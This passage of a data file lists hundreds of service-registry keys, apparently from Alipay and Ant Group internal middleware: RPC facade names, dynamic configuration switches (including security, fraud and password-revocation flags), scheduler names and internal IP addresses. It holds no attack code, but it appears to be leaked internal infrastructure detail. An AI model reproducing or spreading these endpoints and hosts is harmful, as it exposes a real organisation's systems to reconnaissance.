Resource.serviceCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zcbsalescenter.common.service.facade.trade.TransactionOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromoscene.common.service.facade.api.asset.FinsEntityAssetFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_AUTOAFTERMARKETUNIT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.api.ApiQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.oceanbase.obforumcore.service.open.activity.ActivityCommunityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yqdataservice.common.service.facade.yqapi.YuqingDataMessageConsumeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csrobot.service.facade.mng.api.MiningVersionMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.authprod.facade.fieldmng.AuthFieldMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opensupport.common.service.facade.partner.ProductComponentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.reservemng.service.facade.profit.api.ProfitCompareResultQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoplaycenter.common.team.facade.api.MemberQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.189.134#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.scardcenter.common.service.facade.OfflinepayCardRuleServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bpaas.ecomerchant.facade.attachment.admin.AttachmentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.biz.commodities.service.accountgold.CommoditiesAccountGoldTradeConfirmService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcomment.biz.lfc.rpc.LifeCircleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ifxposition.service.facade.ops.edit.OpsEditFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antsecscheduler.common.service.facade.BeyondTrustManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@insautomarket#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.paymentmng.service.facade.PayChannelUseRuleManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.understand.ContentFeatureRelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inscommunity.common.service.facade.JuryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:settleprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dss.endpoint.plugin.openapi.VpcOpenApiFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.csshield.service.facade.api.ModifyFeedbackFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gffund.common.service.facade.api.gfpayment.PaymentAcceptOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifprocess.custdpc.worker.WorkerQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acticketcore.common.service.facade.QuestionExtensionFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ebillcenter.common.service.facade.PDeductInstForecastFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-opencore-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:pcmt_member_template_offline_handler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpensionprod.common.service.facade.PensionProductQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.44.30#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_169.254.248.89#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mdap@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.girisk.common.service.facade.api.monitorbase.TableRelQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.antvip.client.internal.drm.DrmControl.allAvailable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:paytask@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.TransReceiverService:1.0:supergw.d4885.alipay.net@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-PCLOANMNG-TASK#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.vega-integration-kepler:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.unknownErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.inslifeprod.common.facade.policy.InsLifePolicyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.246.163#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mmemberprod.backend.service.facade.MerchantMemberStatisticsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.27.202#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:batchpay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.176.206#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.rccenter.common.service.facade.RccenterIndTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.certifymng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableLoadTestIsland,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.finriskmngcore.common.service.facade.api.InstInfoServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.ipay.ipromocore.common.service.facade.api.CampaignAwardQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:mrchprod_merchantBrandAntProcessCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapires.facade.admin.BusinessDomainManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.testcenter.coreapi.facade.TestCaseMetaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileacauth.service.facade.MauthQueryTokenService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.routeclient.DefaultRouteCoordinator.idcDomainScope,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.appstore.common.service.facade.solution.KBOrderCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.forexprod.common.service.facade.ForexImprestTaskWService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_BKLOANSCENEPROD#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.dchainprod.common.facade.api.receivable.ReceivableDashboardService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.quotstore.meta.event.EventMetaService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bizprodmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableAuthFilter,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilebc.common.service.facade.user.UserSwitchGzFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.core.orderexec.fundapply.config.impl.FundApplyExecConfigDRMResource.writeToExecuteLogDegree,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilepmgw.common.service.spi.api.SyncSpiService:1.0:mobilechat@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbatch.comm.service.facade.accept.FinBatchService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.cif.l2cache.L2CacheClientSwitch.versionStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.rccenter.common.report.facade.disclose.RccenterDiscTablesetDimFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.drm.InsProductDrmClient.newContractProds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:supplyChainArrangementsCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:pcreditmarket@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.181.81#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.opscloudcore.framework.core.facade.OpscloudClientSyncServiceFacade:1.0:pcreditkit@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custinsight.common.service.facade.gplus.GplusEventMetaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.biz.service.gw.community.api.market.EarningsManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inscommunity.common.service.facade.JuryTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ifundcontrolmodel.service.facade.forward.PhysicalTransactionFundForwardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.126.77#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.bizfundprod.common.service.facade.test.FacadeTest:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.assetflux.service.assettool.spi.AssetToolUnfreezeService:1.0:debittrans-unfreeze@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.memberprod.common.service.account.register.LogonIdService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxiantrans.common.service.InsDeductFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icif.service.facade.api.AuthenticationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:ratePubTaskExecuter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icfmng.common.service.facade.api.CheckSummaryApiService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.shared.support.drm.LoanRepayConfigDrm.smartDeductEnabled,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.bkassetmore.common.service.facade.api.DepositProxyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappcommon.common.service.facade.commsync.CommonSyncFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycore.common.service.facade.product.spi.SecurityProductChecker:1.0:bic@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clearingcenter.facade.api.PayOffQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppprod.common.service.facade.recharge.flow.FlowRechargeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbdatacenter.common.service.facade.myreports.BianShenFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudengine:name=com.alipay.cloudengine.loglevel.gfas.logLevelConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openinsight.common.openplatform.facade.scenedelivery.api.SceneDeliveryDemandFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:yebbffweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbprod.common.service.facade.mydds.service.CashingDataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.common.security.dresource.SecurityCommonDrm.paramCheckEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.antgroup.zmxy.zmepinfocenter.common.service.facade.api.creditassets.EpCommCreditAssetsQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.arcore.common.service.facade.migrate.ArrangementQueryStdMigrateRouteFacade:1.0:mainSite@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.findecision:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.loadTestIslandQueueSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.gfas:name=com.alipay.accha.core.drm.FailoverSwitchDrmResource.failoverStatus1,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.airprod.common.service.facade.aircard.cardmanage.PrepaidCardService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.153.197#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.datacaptain.service.facade.DatacaptainOdpsSqlCoverageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acccenter.common.service.facade.inner.ReadMeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.39.135.66#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.certifymng:name=com.alipay.certifymng.biz.permlimit.drm.RevolmngSwitchConfig.superManagerStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.dchaincustomer.facade.api.notify.NotifyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.securitysimulate.common.service.client.drm.SimulateFlowResource.integrationWhiteListAttribute,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.taskcenter.common.service.facade.callback.ProcessCallback:1.0:cstaskChargeBalanceMailProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.cityVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promomng.common.service.facade.workbench.MyTaskQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.notExistExpireTimeMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.55.213.33#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finsecurity.common.service.facade.fullscene.GetSceneInfoByDomainFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openmonitor.qualitycenter.service.facade.IssuePushAdatperServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.aggrbillinfo.common.service.facade.emailbill.EmailBillStatusQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.facade.AfscUserInfoQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfinvest.facade.api.during.InvestICManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.poscore.common.service.integration.drm.impl.DrmResourceTrigger.certifiedDaysLimitedStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileappconfig.common.service.facade.api.StageThemeManagerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","antopo@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.superapiTairCache.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:ofpgrowth@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.astaralarm.common.service.facade.tvm.VulTagManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipayplus.mobile.component.common.facade.cdp.mng.CdpDeliverManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instinfo.service.facade.info.InstInfoQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fraudmng:name=com.alipay.rule.core.engine.config.RuleEngineResource.enableFeaturePreCalc,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.riskmng:name=com.alipay.antvip.client.internal.drm.DrmControl.waitServerListTimeoutMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.decisionx.facade.OuterDataQueryService:1.0:pucprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.merchant.MrchProdCardMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.airbops.web.doom.drm.DoomConfig.enableUploadFile,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:abilitymng_auditTask@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.wishsavings.drm.impl.WishSavingsSysDRMResource.delayTransDealFlag,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.checkroute.biz.shared.changedefense.rest.LogChangeDefenseRestService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbcontent.common.service.facade.api.blacklist.BlackListManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.oyz.core.facade.api.TemplateViewFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.groot:name=com.alipay.common.tracer.manage.TracerDrm.enableRpc2JvmDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-S-BKFM-SCHEDULER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:transferprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP-F-USTRANS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.insclaiminvestcore.common.service.facade.service.institution.SignInstInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchservbase.biz.service.biztask.facade.BizTaskCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.alm.service.facade.facade.ConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.newFrameShutConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secuinfos.common.v3.service.facade.api.InformationSpecialFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinbaseprod.common.service.facade.api.Search30FatConfigMngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.customerTairCache_dest.shardingRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileiclib.common.service.facade.admin.service.SceneProductConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:crmhome@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dataqualitytestsvr.facade.SceneServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zdal.ldc.tair.poscoreTairCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-S-scsupport-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zdatabusTairCache.legacyRwWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insttrade.common.service.facade.OutCardQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:zfcertifycenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.BlackListService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.159.192.78#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_10.15.254.0#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Sub_Servers_TP_C_COMMUNITYPROD#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.zcbsalescenter.common.service.facade.trade.AssetTransSalesQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundprod.common.service.facade.prodmng.api.FundProductValidateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.igopcore.common.service.facade.RefundFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.sandboxhome:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInUserIdLocateValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.prodswitch.common.service.facade.UnifiedSpecialProductService:1.0:ebppcore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbminiapp.common.service.facade.tr.app.AppFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.cif.drm.PasswordRevokeSwitch.gesturePasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.88.150.233#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.personalmng.common.service.facade.api.ConsumeRecordAndFunditemFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acmarketingcore.common.service.facade.activity.TestAccountManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.facade.mng.ActivityAdminQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.CustomerTagService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#tech","com.alipay.superapi.common.core.client.AppInvokeService:1.0:imasp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.18.116.211#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.mybank.bkloanportal.bkmfacade.route.PortalRouteService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acprovisioncore.common.facade.application.AppInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inscontentprod.common.service.facade.content.mng.ContentThemeMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.213#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.FlowConfigDrm.pclaCreditQueryMsgFlow,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kgopen.common.service.facade.insurance.HospitalRelationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.243.108#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antprivacy.common.service.facade.PrivacyAuditFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.shop.MrchProdBizUnitQueryMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.122.93#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.nodejs.ConsumerService:1.0:iatanymock@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.128.108#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.revtrans:name=com.alipay.cif.model.cache.CifCOControlSwitch.switchCurUserStatus,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.poscore.common.service.facade.FinanceInfoService:1.0@XFIRE@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.customscenter:name=com.alipay.customscenter.biz.declare.drm.CommonConfig.customsNotifyConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfundtrade.common.service.facade.api.FundChargeQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.service.facade.api.FootmarkFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbaservice.common.service.facade.auth.api.BlackUserInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifcommon.business.platform.merchantmember.facade.MemberForUserQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imasp.common.service.facade.DeliverCacheMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.opsware.api.facade.ops.OpsProcessDefinitionFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.dasbi.daas.api.export.DatasetExportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.176.147#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchstoreapp.store.biz.ecard.EcardAccessCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.cif.facade.BizCertifyRuleQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.instasset.common.service.facade.partner.InstPartnerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finance.filefactory.sevice.FilePlatformParseReceiver:1.0:finslip@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.177.107#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.lifeexprod.facade.ExMobileSegmentNumberFacade:1.0:lifeexprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tnt.facade.UpdateTaskDetailFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insxhbprod.apportion.service.helper.UserApportionServiceHelper:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.ide.common.facade.quota.spi.ResourceQuotaSpi:1.0:dpstreaming@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.biz.consultant.drm.ClaimCommonDRMClient.downloadCurrentTime,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipayplus.mobile.component.common.facade.appcenter.StageInfoCancelService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:loanpromoweb@DEFAULT#@#DEFAULT_I